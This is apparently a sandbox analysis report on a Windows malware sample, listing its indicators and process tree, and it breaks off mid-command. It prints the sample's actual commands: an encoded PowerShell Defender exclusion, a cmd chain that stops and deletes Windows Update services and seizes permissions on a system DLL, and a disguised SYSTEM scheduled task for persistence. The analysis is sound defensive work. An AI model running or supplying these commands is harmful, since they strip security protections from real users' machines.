e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

General

Target

e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Size

5.3MB
MD5

52fdd7f3ed1b50bc5794983a37cb4064
SHA1

4a185751e9e94dccb3330ca79f893de7ca080482
SHA256

e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA512

4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Executes dropped EXE 1 IoCs

Processes:

services.exe

pid process

1604 services.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2268 takeown.exe
1280 icacls.exe
3708 takeown.exe
2396 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2268 takeown.exe
1280 icacls.exe
3708 takeown.exe
2396 icacls.exe

pid	process
1604	services.exe

pid	process
2268	takeown.exe
1280	icacls.exe
3708	takeown.exe
2396	icacls.exe

pid	process
2268	takeown.exe
1280	icacls.exe
3708	takeown.exe
2396	icacls.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 3836 set thread context of 940 3836 conhost.exe conhost.exe

description	pid	process	target process
PID 3836 set thread context of 940	3836	conhost.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows\services.exe	conhost.exe
File created	C:\Program Files\Windows\services.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3720 schtasks.exe

pid	process
3720	schtasks.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
2120	reg.exe
3472	reg.exe
2288	reg.exe
1172	reg.exe
3472	reg.exe
308	reg.exe
2404	reg.exe
2180	reg.exe
2120	reg.exe
500	reg.exe
2196	reg.exe
3660	reg.exe
420	reg.exe
1524	reg.exe
3644	reg.exe
160	reg.exe
3656	reg.exe
2128	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

3944 powershell.exe
3944 powershell.exe
3944 powershell.exe
1852 conhost.exe
2372 powershell.exe
2372 powershell.exe
2372 powershell.exe
3836 conhost.exe

pid	process
3944	powershell.exe
3944	powershell.exe
3944	powershell.exe
1852	conhost.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
3836	conhost.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeIncreaseQuotaPrivilege	3944	powershell.exe
Token: SeSecurityPrivilege	3944	powershell.exe
Token: SeTakeOwnershipPrivilege	3944	powershell.exe
Token: SeLoadDriverPrivilege	3944	powershell.exe
Token: SeSystemProfilePrivilege	3944	powershell.exe
Token: SeSystemtimePrivilege	3944	powershell.exe
Token: SeProfSingleProcessPrivilege	3944	powershell.exe
Token: SeIncBasePriorityPrivilege	3944	powershell.exe
Token: SeCreatePagefilePrivilege	3944	powershell.exe
Token: SeBackupPrivilege	3944	powershell.exe
Token: SeRestorePrivilege	3944	powershell.exe
Token: SeShutdownPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeSystemEnvironmentPrivilege	3944	powershell.exe
Token: SeRemoteShutdownPrivilege	3944	powershell.exe
Token: SeUndockPrivilege	3944	powershell.exe
Token: SeManageVolumePrivilege	3944	powershell.exe
Token: 33	3944	powershell.exe
Token: 34	3944	powershell.exe
Token: 35	3944	powershell.exe
Token: 36	3944	powershell.exe
Token: SeDebugPrivilege	1852	conhost.exe
Token: SeTakeOwnershipPrivilege	2268	takeown.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2372	powershell.exe
Token: SeIncreaseQuotaPrivilege	2372	powershell.exe
Token: SeSecurityPrivilege	2372	powershell.exe
Token: SeTakeOwnershipPrivilege	2372	powershell.exe
Token: SeLoadDriverPrivilege	2372	powershell.exe
Token: SeSystemtimePrivilege	2372	powershell.exe
Token: SeBackupPrivilege	2372	powershell.exe
Token: SeRestorePrivilege	2372	powershell.exe
Token: SeShutdownPrivilege	2372	powershell.exe
Token: SeSystemEnvironmentPrivilege	2372	powershell.exe
Token: SeUndockPrivilege	2372	powershell.exe
Token: SeManageVolumePrivilege	2372	powershell.exe
Token: SeDebugPrivilege	3836	conhost.exe
Token: SeTakeOwnershipPrivilege	3708	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.execonhost.execmd.execmd.execmd.execmd.exeservices.execonhost.execmd.exe

description	pid	process	target process
PID 1780 wrote to memory of 1852	1780	e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe	conhost.exe
PID 1780 wrote to memory of 1852	1780	e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe	conhost.exe
PID 1780 wrote to memory of 1852	1780	e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe	conhost.exe
PID 1852 wrote to memory of 4012	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 4012	1852	conhost.exe	cmd.exe
PID 4012 wrote to memory of 3944	4012	cmd.exe	powershell.exe
PID 4012 wrote to memory of 3944	4012	cmd.exe	powershell.exe
PID 1852 wrote to memory of 1144	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 1144	1852	conhost.exe	cmd.exe
PID 1144 wrote to memory of 540	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 540	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 2212	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 2212	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 3160	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 3160	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 492	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 492	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 420	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 420	1144	cmd.exe	sc.exe
PID 1144 wrote to memory of 2120	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 2120	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1172	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1172	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3472	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3472	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 308	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 308	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 160	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 160	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 2268	1144	cmd.exe	takeown.exe
PID 1144 wrote to memory of 2268	1144	cmd.exe	takeown.exe
PID 1144 wrote to memory of 1280	1144	cmd.exe	icacls.exe
PID 1144 wrote to memory of 1280	1144	cmd.exe	icacls.exe
PID 1852 wrote to memory of 2900	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 2900	1852	conhost.exe	cmd.exe
PID 2900 wrote to memory of 3720	2900	cmd.exe	schtasks.exe
PID 2900 wrote to memory of 3720	2900	cmd.exe	schtasks.exe
PID 1852 wrote to memory of 2948	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 2948	1852	conhost.exe	cmd.exe
PID 2948 wrote to memory of 1212	2948	cmd.exe	schtasks.exe
PID 2948 wrote to memory of 1212	2948	cmd.exe	schtasks.exe
PID 1604 wrote to memory of 3836	1604	services.exe	conhost.exe
PID 1604 wrote to memory of 3836	1604	services.exe	conhost.exe
PID 1604 wrote to memory of 3836	1604	services.exe	conhost.exe
PID 3836 wrote to memory of 1580	3836	conhost.exe	cmd.exe
PID 3836 wrote to memory of 1580	3836	conhost.exe	cmd.exe
PID 1580 wrote to memory of 2372	1580	cmd.exe	powershell.exe
PID 1580 wrote to memory of 2372	1580	cmd.exe	powershell.exe
PID 1144 wrote to memory of 2404	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 2404	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3660	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3660	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 2180	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 2180	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3656	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3656	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 3880	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 3880	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 3684	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 3684	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 2640	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 2640	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 540	1144	cmd.exe	schtasks.exe
PID 1144 wrote to memory of 540	1144	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
"C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:540

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:2212

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:3160

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:492

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:420

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2120

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1172

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:3472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:308

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:160

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1280

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2404

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3660

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2180

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3656

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:3880

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:2640

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:540

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:3864

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:500

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:3752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2900

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
4⤵
- Creates scheduled task(s)
PID:3720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1212

C:\Program Files\Windows\services.exe
"C:\Program Files\Windows\services.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN 